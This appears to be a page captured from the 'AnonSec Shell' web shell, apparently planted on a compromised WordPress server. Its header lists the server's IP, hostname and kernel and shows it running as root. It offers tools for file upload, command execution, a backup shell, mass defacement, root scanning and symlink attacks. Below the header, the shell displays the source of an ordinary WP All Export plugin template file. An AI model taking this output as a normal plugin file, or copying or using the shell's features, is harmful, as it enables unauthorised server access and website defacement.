AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.16.67.56   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wp-all-export/views/admin/export/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wp-all-export/views/admin/export/google.php
<?php
if(!defined('ABSPATH')) {
    die();
}
wp_enqueue_script('pmxe-angular-app', PMXE_ROOT_URL . '/dist/app.min.js', array('jquery'), PMXE_VERSION);
wp_enqueue_style('pmxe-angular-scss', PMXE_ROOT_URL . '/dist/styles.css', array(), PMXE_VERSION);

$productAttributesJson = empty(XmlExportEngine::$globalAvailableSections['product_data']['additional']['attributes']['meta']) ? '' : json_encode(XmlExportEngine::$globalAvailableSections['product_data']['additional']['attributes']['meta']);

if(getenv('WPAE_DEV')) {
    wp_enqueue_script('pmxe-livereload', '//localhost:35729/livereload.js', array(), '3', true);
}
?>
<script type="text/javascript">
    var wpae_product_attributes = <?php echo empty($productAttributesJson) ? '""' : $productAttributesJson; ?>;
</script>

<div ng-app="GoogleMerchants"
     ng-controller="mainController"
     ng-init="init('<?php if (class_exists("WooCommerce")) echo esc_attr(get_woocommerce_currency_symbol()); ?>',
     '<?php if (class_exists("WooCommerce")) echo  esc_attr(get_woocommerce_currency());?>',
     <?php $is_template_loaded = esc_js(PMXE_Plugin::$session->get('is_loaded_template')); if(!empty($is_template_loaded)) { echo esc_attr(PMXE_Plugin::$session->get('is_loaded_template')); } else { echo "false"; } ?>)"
     class="googleMerchants" id="googleMerchants">
    <?php
    if ($post['xml_template_type'] == XmlExportEngine::EXPORT_TYPE_GOOLE_MERCHANTS && $post['export_to'] == XmlExportEngine::EXPORT_TYPE_XML) {
        ?>
        <span ng-init="selectGoogleMerchantsInitially()"></span>
    <?php
    }
    ?>
    <div ng-slide-down="isGoogleMerchantExport" duration="0.5">
        <basic-information information="merchantsFeedData.basicInformation"></basic-information>
        <availability-price information="merchantsFeedData.availabilityPrice"></availability-price>
        <product-categories information="merchantsFeedData.productCategories"></product-categories>
        <unique-identifiers information="merchantsFeedData.uniqueIdentifiers"></unique-identifiers>
        <detailed-information information="merchantsFeedData.detailedInformation"></detailed-information>
        <shipping information="merchantsFeedData.shipping"></shipping>
        <advanced-attributes information="merchantsFeedData.advancedAttributes"></advanced-attributes>
    </div>
</div>

Anon7 - 2022
AnonSec Team